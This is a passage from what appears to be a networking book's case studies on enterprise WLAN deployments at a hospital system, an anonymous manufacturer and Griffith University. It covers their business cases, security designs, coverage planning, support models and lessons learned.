WLAN to support higher-level applications. The idea is to continue with Lifespan's innovative approach.
Hemendinger's philosophy is "Just keep moving along and grow the WLAN as required to support the
advanced clinical systems required by our clinicians and expected by our patients."

Hemendinger reiterated that the reason Lifespan is so successful is that its approach has always been
pragmatic and futuristic: "Healthcare IT people typically aren't engineering solutions for the healthcare
environment; most are focused on specific projects and tasks. Lifespan looked at it from an enterprise,
re-engineering approach, and we were successful; we placed technology and systems holistically in
concert with each other, not one at a time."
In clinical units, mounds of paper order slips located on a secretary's desk are gone. In the halls,
clinicians wheel laptop carts and carry tablets, always in tune with up-to-the-minute patient data and
clinical decision support systems. In conference rooms, administrative personnel wirelessly connect to
network presentations, e-mail, and Internet access. On the nursing unit where the first personal VoIP
device implementation was recently completed, the silence is deafening, with overhead paging virtually
gone. This has a very positive effect on patients' ability to sleep, and it removes the constant reminder
to patients that they are in a hospital.
Tracking and Telemetry

Hemendinger sees Lifespan's next step for breakthrough technologies emerging in the tracking and
telemetry fields. He says that asset and resource tracking is a huge initiative in the healthcare arenait's
the basic building block for process study and optimization. The idea is to have the WLAN infrastructure
provide a method for gathering and transporting positional telemetry within the enterprise, which could
include high-value assets, people, and processes.
In the healthcare environment, being able to track the location of a critical piece of equipment and direct
it to the necessary location can have life-saving consequences. Being able to track and find medical
devices for use and maintenance has financial benefits to all. Providers can quickly locate a piece of
equipment without spending critical time searching for where it is supposed to be. This also allows the
strategic placement of machines as opposed to having large numbers of them placed throughout the
hospital. Typically these machines are very expensivereducing their numbers and optimizing their use
reduces cost.
Hospital telemetry devices (such as EKG and fetal heart monitors) are historically large machines that
impede the movement of patients. Improving the quality of care and enhancing the healing process
includes making the time spent in the hospital more comfortable. Allowing patients to move about and
be active is important to healthcare providers. Referring to how patients were traditionally confined to a
room or bed because of the medical monitoring device to which they were "tied," Hemendinger sees the
value in being able to provide the patient with the ability to move freely while receiving medical
treatment: "We want to untie the monitored patient from their room as they are today due to immobile
monitoring systems."
To fully utilize the enterprise WLAN to facilitate patient monitoring and telemetry, companies are shifting
from conventional wired bedside devices to more portable, wireless-enabled ones. Medical information
collection systems are becoming smaller, which helps to enable remote monitoring.
Hemendinger is also focused on the possibilities and future use of wireless, handheld point-of-care
devices. Because these devices are portable, nurses and physicians can carry them around as they
perform rounds to collect patient information. These wireless data collection and test devices will have
continuous online connectivity with the clinical system for data transfer and retrieval. "The very sick
patient who goes into Intensive Care requires lots of monitoring, and the physician or clinician will want
to be able to monitor independent of location while having information fed back into the clinical
systems," reports Hemendinger.
Radio Frequency Identification (RFID)

RFID technology is currently in pilot testing at Lifespan. Mostly for discovery purposes, the company is
looking into active and passive systems, both of which use the WLAN as a transport. Passive tags are
used as an upload point from patient wristbands, which provide higher levels of patient identification, act
as a backup device to bar-coding, and contain information in the form of a payload for use by the clinical
systems. Active systems are less mature and are challenged with computational power.
Summary
Lifespan's innovative approach in the deployment of an enterprise WLAN has allowed the company to
offer anytime, anywhere access of clinical systems to its physicians and clinicians. Lifespan's use of this
technology and the cultural change it has produced makes the company a visionary in the realm of
wireless technology. The delivery of healthcare in Lifespan's hospitals has changed. Its enablement of
wireless devices for digital imagery, seamless connectivity for point-of-care systems, always-on network
access to LifeLinks, and gratuitous WLAN access for patients makes it truly superior in enterprise WLAN
deployment in healthcare.
Chapter 11. Manufacturing Case Study
The manufacturing industry has unique key components. The network acts not only as a transport,
which people use to send data, but also as a business process enabler. Many functions of the WLAN are
independent of general network access. Such examples include factories, the machinery that builds
products, and inventory or material goods that reside in warehouses. This case study outlines some of
these situations while still focusing on the typical office considerations. Key points discussed here fall
into three categories: technology, process, and policy. This chapter also outlines the business
considerations that help justify the use of WLAN and the future state as seen through the eyes of the
manufacturer.
The manufacturer interviewed for this case study chose to remain anonymous; however, a brief profile
will provide perspective for this chapter. The company is a member of the Fortune 500 and is the market
leader in its specific industry. The company employee base is more than 50,000 people with a global
presence in excess of 100 office locations in more than 20 different countries. Relative to other
companies of their size, this company is taking on a new direction in the way it provides infrastructure
services and can be considered an early adopter of wireless networks. Other companies in this space and
of this size take a more cautious approach because the resulting cost to implement will sometimes
severely impact both operational expenditures (OPEX) and capital expenditures (CAPEX). The revenues
for this manufacturer exceed 20 billion U.S. dollars, which equates to more than 2 billion dollars in profit.
Business Model
The company's adoption of WLANs as a technology was based on the initiative to help increase user
productivity, adopt Radio Frequency Identification (RFID), provide an alternative to physical cabling in
the factory floors, and as an inventory control mechanism in the warehouse.
The company's use of WLANs had to fulfill two main goals:
First and foremost was the need to provide adequate documentation supporting the ability to
secure the transmission of data in the wireless medium.
Additionally, with the arrival of Sarbanes-Oxley, it had to be reviewed for compliance.
The compelling story that supported the business case for deploying WLANs was the result of a time
(use) study. The goal of the study was to prove a financial benefit to deploying WLANs. Those employees
who participated were asked to record their time daily.
This employee test bed consisted of three small groups composed of 15 to 20 individuals. They were
grouped into two user categoriesmobile and nonmobilewhich were then further classified into three
groups as follows:
No laptop
Laptop with no access to WLAN
Laptop with access to WLAN
Note
Mobile users were defined as individuals who work more than 15 hours a week away from their
desk while still in a company facility.
The results of the study from each user group were compared to each other to subjectively support the
need for WLANs in specific areas.
Note
Initially, the company did not encourage the use of the WLAN as a primary means of network
access because of cultural issues specifically, work patterns and concerns about security.
The time study focused on people productivity; however, the company had an additional hurdle to cross.
It was time for them to migrate their manufacturing and factory facilities from the older 900-MHz
systems to a more current 2.4-GHz (802.11) infrastructure. This would allow them to take advantage of
the emerging technologies and products coming into the market. Especially important was the ability to
take full advantage of RFID and cost avoidance and to provide flexibility. This is covered later in this
chapter.
The company is conducting a post-WLAN implementation follow-up study using the same individuals to
validate the assumptions and provide the needed data that would show a positive ROI.
The architecture for the WLAN was initially based on three components:
Security
Coverage
Throughput
Security
As the chief technical concern, security had to be addressed to meet the existing company policy on
wireless technologies. As a precaution before the WLAN project kickoff, the company instituted a
moratorium on WLAN use. This proved to be well founded because security standards for WLANs
continued to evolve.
The security architecture was built on the Cisco SAFE Blueprint. As is good practice, decisions related to
security were based on a risk assessment. Each deployment (that is, site) required a local policy based
on the findings of this assessment and business needs. This then led to a more formal practice where a
policy could be enforced. Each policy was built on four factors:
Threat analysis What the potential threat is and what damage an exploit could cause, typically
formed around financial losses.
How to secure Which type of security would or would not be allowed.
What to encrypt What value the information being protected holds.
Which IP policy to use Whether the IP addresses used would be public (routable) or not.
Note
You can find more information about Cisco SAFE, including the white paper, "SAFE: Wireless
LAN Security in Depth - version 2," at http://www.cisco.com/go/safe.
The actual design employed throughout the enterprise was in line with the published Cisco
recommendations. This included the Lightweight Extensible Authentication Protocol (LEAP) with Wired
Encryption Protocol (WEP) and Dynamic Key Rotation, migrating over time to LEAP with Cisco Key
Integrity Protocol (CKIP). The support infrastructure for authentication and validation was provided
through the use of Cisco Access Control Server (ACS) and the company's Local Directory Authentication
Protocol (LDAP) services. Each system was strategically placed local to where the deployed services
would be installed.
Coverage
The intent of the WLAN was to give access only where it might be most used. The company culture
directed this approach. This meant that during the initial deployment, not all areas in the office facilities
were provided with WLAN coverage. They were limited to conference rooms or other group meeting
areas (for example, cafeterias). The deployment up to this point was successful because the company
policy and culture did not encourage an extended use of the WLAN for network access. The technology,
however, has seen consummate adoption at all levels and functions of the employee chain. This desire
for ubiquitous wireless access has since changed the WLAN from being a convenience to a required
service resulting in an enterprise-wide deployment.
Even with this change in direction, the design was focused on providing proper coverage as opposed to
providing a fixed throughput. Today, the WLAN-enabled areas still remain unchangedemphasis and
priority are given to more formal meeting areasbut the general office population receives the service as
a byproduct of the signal bleeding into other areas.
Note
The entitlement of wireless and mobile devices such as laptops and PDAs is not ubiquitous in
the enterprise.
The company's direction is that the WLAN will not be a replacement for the wired office. It is simply an
overlay network of convenience. Furthermore, no compelling argument has ever been made to support
the need for roaming; therefore, WLANs are confined to "roaming domains" such as a factory or single
building.
Factories, however, do have additional conditions to meetprimarily, the need for dynamic modification of
the physical layout on the factory floor. This condition drove the need for more flexible designs and
installations. The WLAN in the factory had to support an environment that had physical churn. Physical
layout changes occur to a point where changing the traditional wire infrastructure would become costprohibitive. In essence, within the factory, the WLAN became a replacement for traditional wired access.
A constant hurdle in the factory and warehouse is that they are typically filled with wireless obstacles.
Factories tend to be filled with large metal machines that perform specialized functions such as
processing and metal machining through the use of robotics. This fact alone made the effects of
multipath, attenuation, and interference very serious factors to contend with. Certain systems on the
factory floor also could be hampered by the WLAN (RF interference on existing systems) because they,
too, operated in the unlicensed 2.4-GHz bandalthough they were not tied to the 802.11 protocol. To
overcome these hurdles, one key difference in the design for the factory was the use of directional
antennas, which played a major role in the factory WLAN design.
Throughput
Several factors came into effect concerning the throughput over the WLAN:
Policy
Cost
Coverage
Mobility did not dictate the use of WLANs, and as we previously mentioned, the culture did not
encourage the use of WLANs. Today, and like other companies, the change in work behaviors from
"heads down" to more "open collaboration" has since changed the stance (policy) that the company
takes toward mobility in the workplace.
Even though WLANs are becoming more of an accepted enabling technology, the cost still needed
significant justification. The cost of the infrastructure in an environment where WLANs were initially not
used as a primary access method to the network meant that strategic placement was done in a manner
where "the most bang for the buck" could be realized.
Both policy and cost forced the IT organization to provide maximum coverageversus highest
throughputwith a minimal investment in infrastructure. This design dictated that data rate shifting be
allowed because it would allow users to associate with the WLAN from greater distances at the expense
of throughput.
As a result (either directly or indirectly), performance and availability issues arose. It has been shown
that allowing for dynamic changes in the WLAN (data rate shifting), in an often-unpredictable medium
can become counterproductive in the long run. This practice might change in the future.
Deployment
The deployment was handled primarily by internal resources. This method was aided by the fact that the
deployment was limited, but additionally it worked as a catalyst to build awareness, ownership, and skills
within the team. In the general deployment, the only aspect that was handled outside of the company
was the cabling. The local IT team did site surveys, installation, and configuration. The exception was
factories, where professional third-party companies were employed for site surveys.

Enterprises often initially struggle with the added financial burden of deploying, managing, and operating
WLANs; over time, their growing dependence upon the service makes it unacceptable to have
interruptions. What initially begins as an overlay network becomes a top priority when broken because of
the sheer number of employees relying on the WLAN. In the future, as services grow in demand or as
advanced technologies are added onto the original WLAN architecture, the company will wrestle with the
growing need for access and the subsequent financial challenges.
Now that the WLAN is finding its way into the general office population, the need for additional services
such as guest access and voice are becoming part of the general architecture. Being highly securityconscious, the company must also identify a mitigation plan for rogue device detection.
Guest Access
At present, the company does not provide guest access as a common practice. Much of the need did not
exist initially, but as the market adoption starts to climb, this added-value service becomes more
realistic. The company sees the use of guest access not only as a convenience but also as an additional
layer of security.
Voice over IP
Today, the company is currently adopting Cisco VoIP to offset climbing telephony costs and to take
advantage of business-enabling applications and services that can be provided through a converged
solution. One of the VoIP technologies used is Cisco IP Communicator, which is the software-based
solution that makes the PC a fully functional IP phone. Over time, the wireless-enabled PC will need to
be supported by a voice-enabled WLAN.
Many challenges lie ahead for this company when it comes to delivering a voice-enabled WLAN. Issues
about telemetry and location services that allow a phone to be located in case of emergency will be a
major focal point. Most important, the re-architecture of the WLAN to support better throughput, quality
of service (QoS), and roamingboth Layer 2 and Layer 3will need to be completed to support applications
and services that continue to emerge.
Rogue Access Point Detection

Rogues APs comes in two flavors: those that are friendly and those that are not. Friendly rogues are not
malicious, but they are also not wanted. Unfriendly rogues are considered malicious and not wanted.
Without a plan in place to identify either one, the company has no mitigation option available. Additional
work is being carried out to manage the threat of rogues in the enterprise. The variety of tools and
management systems that exist on the market today are being evaluated to address this issue.
Summary
The manufacturing company examined in this case study uses WLANs to improve productivity (office)
and business process (factory). Like many companies that adopt technologies early, the financial
restrictions and company culture that existed forced the deployment to be limited in scope and scale.
The due diligence done in the discovery and initial deployment proved successful in driving the
acceptance of WLAN as a viable and financially justifiable solution. In addition to having to work within
financial limitations, the company was challenged with finding a solution that could provide a sufficient
level of security. A WLAN also proved beneficial in the factory by helping to reduce cost and allow for
flexibility. Looking forward, further uses of the WLAN, such as voice and RFID, continue to be examined.
Chapter 12. Education Case Study
Opened in 1975 to the south of Brisbane, Griffith University specializes in Australian environmental
studies, humanities, modern Asian studies, and science, with the addition of recently opened medical
and dental schools. Serving a demographic area comprising of the Brisbane-Logan-Gold Coast corridor,
the university opened a new $38 million campus at Logan City in the late 1990s. Today it has
approximately 40,000 staff and students across five campuses. Over the years, Griffith University has
demonstrated a capacity to innovate continually while adapting to change and has acquired an enviable
national and international reputation. It is now considered one of Australia's most progressive and
dynamic tertiary institutions (known as higher-education institutions in the United States). The
university's five campuses are situated on the Brisbane-Logan-Gold Coast corridor of southeast
Queensland, the fastest growing region of Australia.
Universities, by their very nature, tend to be vibrant and progressive environments. Young people, and
especially those engaged in higher education, typically embrace technology, new media, and IT services.
To satisfy this social dynamic and to address other more tangible business requirements, Griffith
University decided in early 2004 to deploy wireless networks in targeted areas. Adopting a phased
deployment process, the network and communication Services group chose to nominate "Smart Zones,"
which are specific areas where WLAN connectivity was provided with a high degree of stability, with a
service-oriented design philosophy.
Note
Network and Communication Services is a work unit of 18 staff responsible for the design,
procurement, implementation, operation, and maintenance of all aspects of the Griffith
University voice and data network. Included within this network are a Smithsonian Medalwinning private wide-area network, a 13,000-port data network spanning the five campuses,
and a voice network of 7,000 handsets.
The development of an inclusive and wide-ranging web portal, named Wireless@Griffith, was
instrumental in achieving the success of the solution. Today, less than two years after the initial planning
stages began, the adoption rate has proven higher than expected, and the popularity and real-world
benefits of the solution are tangible. Student satisfaction is greater, the WLAN is highly used, the need
for dedicated wired computer labs has been reduced, and the university boasts an impressive and
progressive online campus in line with its reputation as a trendsetter in the Australian educational sector.
Business Model
The primary business case for Griffith University's enterprise-class WLAN was to provide increased IT
services, reduce the load on existing computing labs, and supplement existing wired network
infrastructure. There was a vocal request from academic staff for wireless services and a strong desire to
take advantage of the mobility benefits offered by the technology. Most faculty were already equipped
with laptops, and many had personal PDAs, both of which were often used for academic activity and staff
productivity services.
Furthermore, extensive research, including large-scale student surveys, showed that more than 50
percent of students owned and used laptop computers. Many of these laptops were already fitted with
wireless connectivity, and most students stated a strong desire and support for university-provided
wireless service.
Adoption has been very high among the student body, followed marginally by the academic body. All
network and IT services are available through the WLAN, which is effectively only an alternative
transport medium. It removes the need for users to find a desk and Ethernet port, therefore extending
connectivity and access to the users' locations and not limiting their ability to use IT services to specific
localities.
The model Griffith chose for its underlying wireless coverage maps was quite different from that of many
other universities. Whereas other educational deployments have typically opted for blanket coverage,
Griffith chose to provide connectivity only in specific Smart Zones, for several reasons.
Smart Zones allowed the IT group to dissuade faculty members from using wireless within their staff
offices, where they already have 100-Mbps switched cabling. "Most staff do not understand that wireless
is a shared medium technology," says David Renaud, wireless network support engineer at the
university, "and is not meant to be a replacement to the wired infrastructure, but as a complementary
technology to be used in specific Smart Zones."
Figure 12-1 shows the Smart Zone, shaded in gray, where wireless coverage is provided in one of
Griffith's campus buildings. Coverage maps, such as this one, are made available on the
Wireless@Griffith portal, allowing university students and staff to check service areas at any time.
Figure 12-1. Smart Zones
Reprinted with permission of Griffith University
Equally important, by providing coverage in specific Smart Zones only, users were guaranteed a quality
service. Signal strength and coverage are guaranteed in the Smart Zones. Although students and staff
might be able to access the WLAN outside of the coverage areas, they can experience low data speeds
or connectivity problems. No IT support is offered to users and staff outside the Smart Zone. "By
adopting this model, all parties have a clear understanding as to where we will support users on
wireless," explains Renaud.
Griffith University makes the following service disclaimer on its web portal:
"The Wireless@Griffith service is only guaranteed within the shaded coverage areas on the maps. If
you are outside these coverage areas, you may still have network access, but you may also
experience problems with your wireless network connection. Unless you move into one of the
shaded coverage zones, we cannot ensure that you will receive service."
The Smart Zone model has proven very successful for the university. Satisfaction levels remain high
because the user population understands where connectivity is provided.
Topology
The IT staff at Griffith University opted for a simple architecture that would integrate seamlessly with
their existing security infrastructure. Choosing a simple, flat network with a single VLAN per geographical
campus also helped reduce the operational support overhead with easier troubleshooting and secondand third-level support. (You learn more about the university's three-tiered support system later in the
section "Service and Support.") This in turn provides connectivity to a VPN concentrator only. Access
points are therefore isolated from the normal academic network, and access is only possible through
authenticated VPN sessions. Additionally, by limiting the numbers of VLANs to one per campus,
seamless inter-AP roaming is supported, with no loss of VPN session connectivity.
Figure 12-2 shows how the wireless LAN (shaded in light gray) and access points are isolated from the
production data network (shaded in darker gray) by the use of a VPN concentrator. Access to the
university network, servers, and services, and even the Internet, must go through the concentrator. This
design ensures that only authorized traffic ever traverses the university's network.
Figure 12-2. Typical Griffith University Campus
802.11 Wireless Networking Standards

Griffith standardized on the 802.11g WLAN protocol for its WLAN. This choice provided backward
compatibility with the older, more common 802.11b standard (also in the 2.4-GHz frequency range), and
it also offered higher speeds and increased throughput for client devices that supported 802.11g. It
should be noted that 802.11g access points "step down" to 802.11b speeds when 802.11b clients are
associated, so the full potential of this decision will not be realized until the majority of older 802.11b
clients are replaced by staff and students. The university is actively facilitating maximizing the number of
802.11g clients in use because on-campus computer stores stock Linksys 802.11g cards at competitive
rates. David Renaud reports that many hundreds of cards were sold in the first six months of operation.
The university therefore encourages the use of 802.11g over the older 802.11b standard.
To reduce cost, the university initially chose not to adopt the 802.11a standard, which would have
required purchasing 802.11a radio modules for the university's access points. More recently, the newermodel access points come with 802.11a by default, and the university encourages users to utilize this
frequency band where possible.
Access Point Settings

The access points have been configured to allow a maximum of 15 concurrent sessions. The university
arrived at this figure based on the desire to provide connectivity to its users equivalent to or better than
cable/ADSL speeds. A primary architectural and business goal was to provide a quality service to users.
User perception of a high-quality service would most likely be influenced by connectivity and speed.
"Although 15 may be a smaller number than other institutions have," says Renaud, "we would rather cut
users off at 15, rather than risk the Wireless@Griffith service being perceived as slow and cumbersome."
Such a perception has been avoided by careful, proactive planning. In locations where traffic was
predicted to exceed 15 concurrent users, such as the large Gold Coast campus (where usage peaks
around 40 users in the only Smart Zone), more than one AP was installed; in this case, three access
points were deployed in one Smart Zone.
Furthermore, the minimum association rate has been set to 11 Mbps. This setting helps manage the size
of the cell and ensures that users will always enjoy high throughput. This careful, proactive planning has
ensured that a good level of service, or user experience, has been achieved. The emphasis on a quality
service has had a very positive effect on the solution's success.
Signal Strength, Antennas, and Outdoor Coverage

The signal strength is not limited on most access points, which allows greater coverage. The exception is
the university's South Bank campus, located in the commercial downtown area of Brisbane, a major
Queensland city. In this area, access points are configured with lower transmit power to reduce "leaking"
into nearby offices and public areas.
Additionally, the IT group uses external omnidirectional antennas to cover several outdoor spaces,
besides 6dBi and 12dBi patch antennas.
Radio Cell Architecture

Wireless users can "step down" to lower speeds the farther away they are from the access points, until
they reach 11 Mbps. The access points are configured to allow association at speeds of only 11 Mbps or
higher. This setup ensures a quality experience for users and provides more predictable cell sizes and
coverage zones.
Global Naming Standards

A global naming standard was adopted in line with the university's existing policies. This standard
ensures that second- and third-level support functions can easily identify the access points and quickly
resolve their locations during troubleshooting activities.
Details of the naming standard for APs follow:
<campus><building>[<room>]<device id><ap number>
This scheme is based upon the following values:
campus An abbreviation of the campus name, such as na, mg, gc, lo, or sb.
building The three-letter code assigned to the building by the Office of Facilities Management, such
as BUN or WCN.
room The official university room number, such as 1.43c or 0.45. The dot is omitted from the
device name.
device id A two- or three-letter code used to identify the equipment type. In this case, it is "ap"
for access point.
ap number An integer value based upon the number of access points in each particular Smart
Zone.
An example device name would be nabcn213ap01. This name designates the first access point in room
213 of the BCN building in the Nathan campus.
Wireless Equipment
The university undertook a rigorous and detailed equipment evaluation and selection process. Bruce
Scott is the manager of the network and communications services group. His team created detailed
requirement specifications and evaluated 10 equipment manufacturers. After initial evaluation and
review, a short list of three vendors was created, and extended testing and review was undertaken. Each
vendor was asked to supply test access points and clients for the university's IT staff and laboratories.
Finally, the Cisco Aironet solution was adopted and the 1200 series access point selected. Lately, the
university has moved on to the more recent 1131 model access point.
Network Management
Early on, the university identified the need for dedicated WLAN management capabilities. As such, and in
line with their selection of Cisco infrastructure, the IT staff selected and deployed the Cisco Wireless LAN
Solution Engine (WLSE), a dedicated wireless network management appliance. The WLSE provides the
university IT staff with visualization, configuration, and image management, dedicated wireless reporting
capabilities, and RF management features.
The Cisco WLSE is also used to provide graphical traffic and usage reports for the service portal, thereby
offering IT staff and users intuitive and friendly information on service availability and trends.
Additionally, because a VPN overlay plays a fundamental part in the solution, regular reporting is
undertaken for the following:
Total number of unique users on a monthly and cumulative basis
Total number of logons on a monthly and cumulative basis
Average VPN session time on a monthly and cumulative basis (varies between 60 and 100 minutes
per logon/session)
The university is also in the process of implementing a comprehensive network operations center that
will manage not only the wireless but also the wired network.
Service and Support

Griffith University's WLAN is supported by a three-tiered system, as described in this section.
Tier 1: Information Services

Tier 1 is the university's help desk. Part of the Information Services Division, it provides students and
staff with their first port of call when requesting assistance. This team provides basic troubleshooting,
including referring end users to the extensive solution web portal that encompasses comprehensive
FAQs and training material. Technical problems that cannot be handled at this level can be escalated to
Tier 2 support.
Tier 2: Element IT and Learning and Environment Department

Tier 2 support is segmented between staff and student support. Staff support is provided by Element IT,
and student support is provided by the Learning and Environment Department.
Element IT support provides detailed technical assistance to university staff on wireless issues and on
standard desktop and application support. This support includes remote desktop management where
appropriate. This group is also responsible for packaging the preconfigured VPN client in all staff laptops,
in line with the university's Standard Operating Environment (SOE).
The Learning and Environment Department provides daily in-person wireless support for students, which
can be booked through the Wireless@Griffith web portal. This support has proven integral to the success
of the rapid adoption by students, with hundreds of students training and configuring their laptops each
semester. For example, in one three-week period during early 2005, more than 500 students attended
training and laptop configuration sessions.
Complex or design-related issues can be escalated to Tier 3: Network and Communication Services.
Tier 3: Network and Communication Services

Tier 3 support is provided by the architects and engineers responsible for the solution. This group
includes dedicated WLAN support engineers, such as David Renaud, and is managed by Bruce Scott. Tier
3 support addresses problems escalated by Tiers 1 and 2, which are usually coverage problems or issues
relating to access point failures, difficult-to-troubleshoot interference problems, and the more complex
RF-based issues.
Client Management
Because of the straightforward yet secure architecture that Griffith adopted, client management has
been greatly simplified. By avoiding the use of specific Extensible Authentication Protocol (EAP)
mechanisms or encryption standards and adopting a secure VPN overlay, the WLAN can support many
different client types. No particular configuration is necessary. Each device must be capable of running
the university's Vlink VPN software client, which is available for Windows, Macintosh (Mac OS X), and
Linux operating systems. Limited support is also provided for PalmOS and Windows Mobile devices
through a third-party client utility. Because the university does not provide this software to users, it
must be purchased by those who want to use their PDAs wirelessly.
Additionally, the network and communications services team provides support for several particular
wireless cards and drivers, including those produced by Linksys, Apple, and Dell. Other nonsupported
clients can just as easily connect, as long as they can successfully use the Vlink VPN software, but the
university limits its official support to these clients. University computer stores sell Linksys wireless cards
to students who want to wirelessly enable their laptops.
The need for extensive client management is therefore avoided. User support and management are
handled through the solution's service portal, Wireless@Griffith, an internally developed intranet web
portal that provides extensive instructions, training material, and links to the various software clients.
Furthermore, the use of a "walled garden" ensures that users are automatically provided with access to
the VPN software clients. This setup avoids unnecessary support calls and helps reduce the operational
overhead borne by the network and communications services team. Any client who associates to the
WLAN and launches a browser is automatically redirected to the service portal, where he download the
VPN client. No further connectivity is possible, and the user must install and use the client for further
access.
Security and Rogue AP Detection

The university WLAN is secured through the use of a VPN overlay. This simple yet extremely secure
solution provides robust 128-bit AES-based security and data integrity. Standardizing on two 3000 series
Cisco VPN concentrators at different campus locations for redundancy, the WLAN requires users to install
and use a repackaged Cisco VPN client, renamed "Vlink" by the university's IT departments.
Each university student and faculty member is automatically provided with network credentials as part of
his normal day-to-day activity. These credentials are used extensively to authenticate the users for
everything from basic network access on the wired LAN to Internet access for billing purposes. The
WLAN leverages these preexisting credentials, and the VPN client and concentrators use them to validate
user identity. By using the same credentials, ease of use is increased, and users are not expected to
become familiar with a separate authentication framework.
Radio-based rogue AP detection is undertaken through the features of the Cisco WLSE. The WLSE
provides the IT staff (and upcoming NOC) with visualization and alert-based notification of potential
rogue APs.

Deployment of Griffith University's WLAN solution was undertaken on a phased basis. This approach
allowed the university's IT staff to validate the architecture from a technical and security basis, introduce
the services on an incremental basis, ensure that support staff were among the first to familiarize
themselves with and benefit from the solution, and finally avoid the "big bang" approach for service
introduction.
Careful site surveys were undertaken and cabling was laid before each access point was installed.
Finally, each Smart Zone was tested before being launched as a production service.
Deployment Phases
Phase One of the deployment concentrated on IT areas, cafes, outdoor locations, libraries, and learning
centers. The areas selected for Phase One were partly defined by the end users (see "Lessons Learned
and Recommendations" later) through proactive user surveys and requirements definitions.
Note
Learning centers are "computer labs on steroids," according to Scott. They are specialized
areas set aside for student study, research, and educational activity. Griffith University learning
centers typically house 90 desktop PCs in a large open area, with additional breakout rooms
and group study rooms available to students. Highly used and very popular, the learning
centers provide the students with a dedicated space within the university environment to
concentrate on their academic activities. They were a logical prime location for early
deployment.
Phase Two of the deployment added all seminar rooms and 80 percent of "bookable" teaching areas
(excluding the main lecture halls and laboratories). All staff meeting rooms and common rooms were
also included. This phase was only undertaken after the successful completion of Phase One; in other
words, the Network and Communications Services team addressed any problems that were identified
during Phase One before proceeding with more widespread deployment. Phase Two saw the extension of
WLAN coverage into teaching areas and greatly increased the "footprint" of the solution, with more than
150 additional access points deployed.
Phase Three of Griffith University's deployment addressed the lecture halls and scientific laboratories.
Only recently completed (late 2005), this phase adds to the coverage and extends the service into
practically all teaching areas. Nearly all outside areas where staff and students congregate are now
covered.
A planned fourth phase will be undertaken in. This phase will address dead spots identified by end users
and the Network and Communications Services team, in addition to remaining areas that were originally
deemed low priority. Phase Four will bring the university closer to ubiquitous coverage.
Site Survey
It pays to plan for capacity because as more and more students purchase laptops, providing
enough capacity will be critical.
David Renaud, Wireless Network Support Engineer
An independent vendor was appointed to undertake the site surveys and the installation and
configuration of the access points. The vendor was given detailed instructions and a template from which
to work. These instructions included the stipulation that a signal strength of at least 50 percent (when
measured by the Cisco Airnet Client Utility) was required at all locations within the Smart Zone. This
requirement was achieved by taking four signal strength measurements at the extreme edges of the
Smart Zone. Where coverage problems occurred, external high-gain antennas were used.
Figure 12-3 shows the location of access point naasn003ap01 in a project room. The four black circles
mark the locations where Griffith IT staff measured signal strength to ensure that it met the 50 percent
benchmark.
Figure 12-3. Validating Signal Strength
Reprinted with permission of Griffith University
Some general guidelines have been adopted over the course of the deployment phases. These
guidelines, based upon environmental factors and the nature of university buildings, offer further
direction during the site survey process:
For buildings that have internal concrete walls, there is one access point per room.
For buildings that have internal Gyprock (plasterboard) walls, there is one access point per two to
three rooms. However, this is largely determined by the capacity (in terms of potential users) of
the rooms, as detailed earlier. If more than 15 concurrent users are expected, more access points
are used.
For soundproof rooms and laboratories, access points are mounted inside an AV cabinet or in an area
where the signal will pass through a glass window into such a room.
Cabling
During Phase Three, it was decided that two cables per access point would be installed. Originally, this
provision was to allow for an extra access point to be installed in the future, should demand increase.
However, university IT staff discovered that they could use the second cable for console access,
providing out of band (OOB) management capabilities. This capability has proven to be of great
assistance to the IT staff, not the least because of the extended nature of the university's wireless
network, which is spread over five campus locations. Two cables per access point now forms part of the
Office of Facilities Management (OFM) building standard.

The site survey vendor configured the access points, working from a template and detailed work
instructions, which expedited the deployment and avoided university staff resourcing problems.
Testing
Upon physical installation of the access points by the site survey vendor, the access points were
configured and tested. During each deployment phase and before the service was launched in each area,
the WLAN was tested again by IT staff, and coverage maps were generated. Only after service
availability was validated were the areas added to the web portal and the WLAN made available to users
in that locality.

Griffith University uses an internally developed and fairly mature project methodology, based upon a
typical staged gate approach. Initially, a technical impact statement was produced, detailing the
technology, integration, security risks, and proposed high-level architecture. Following this, a business
case document was produced that was evaluated and approved by the project advisory group, made up
of senior IT management. The project advisory group was assisted by a separate technical advisory
group, which focused on the detailed technological, architectural, and security issues.
Upon approval, a project implementation plan was created, and the product evaluation process began,
followed shortly thereafter by the detailed design, pilot, and Phase One deployments. Throughout the
project, a steering committee of business stakeholders met on a monthly basis for project updates and
to track deviations from the plan.
A dedicated project manager, a member of the network and communications services team, managed
the project from start to finish.
Challenges
The primary challenge that the Network and Communications Services group faced was convincing each
separate support group to embrace the solution in its entirety. "The issue that caused me the most
trouble was support," says Bruce Scott. Personalized attention was critical, as was ensuring that the
support organizations were part of the first deployments; this included those inside Scott's group and
those from other departments. This solution ensured that the IT staff, who would be responsible for the
success of the solution, were among the first to benefit from the WLAN. Scott's team continues to
provide training and transfer of information (TOI) sessions to all technical organizations within the
university on a periodic basis.
Another challenge was simply delaying the adoption and widespread deployment of WLANs in general,
until such time as an approved, secure, and supportable solution and architecture was developed by the
network and Communications Services group. "[We] caught a beating in the early days," recounts Scott,
"but it was worth it in the end." The university now enjoys a robust solution based on proven
technology, and it avoided much of the security and technical risks associated with early adoption and
trailblazing.
Finally, although the university's technical teams defined a very secure solution (based on a VPN
overlay), the physical security of the access points was of particular concern in an open educational
environment. Many of the access points are placed in open areas, with a high degree of public foot
traffic, whereas others are in more secluded areas. Both locations present potential vulnerabilities to
theft of or interference with the access points. To address this problem, the university chose to conceal
the physical location of the access points and to secure them with locks. This solution has been
successfulwith more than 300 access points installed and more than 30,000 students, not a single
incident of physical theft or disruption has occurred.
Lessons Learned and Recommendations

When asked to describe lessons learned, Bruce Scott and David Renaud provided the following five
recommendations.
Sort Out Support Up Front

Define your support model and ensure that it works. University staff members have been very active in
ensuring that users can access the WLAN easily and securely. The solution will fail if users cannot
depend on reliable WLAN service. The work David's team put into ensuring a positive user experience
and a robust support model has ensured the success of the solution.
Build a Solid and Well-Tested Architecture

Scott recommends that you design, build, test, and pilot the architecture before undertaking a widescale
deployment. Phased implementation also allows for the incremental introduction of the solution, along
with spreading the support load and ensuring that IT staff are trained and familiar with the service.
Not only did Scott and Renaud's team pilot its architecture and validate its technical and security stability
with an incremental deployment, but it also commissioned independent audits. The university's WLAN
solution was audited by Queensland Audit Office, an independent State Government body that assists
the Auditor-General of Queensland in providing independent audit services to the Queensland Parliament
and all state public sector entities and local governments in Queensland.
Furthermore, the wireless network was certified as Secure by Electronic Warfare Associates Australia, a
commercial but independent security analysis and vulnerability auditing corporation. EWA-Australia is
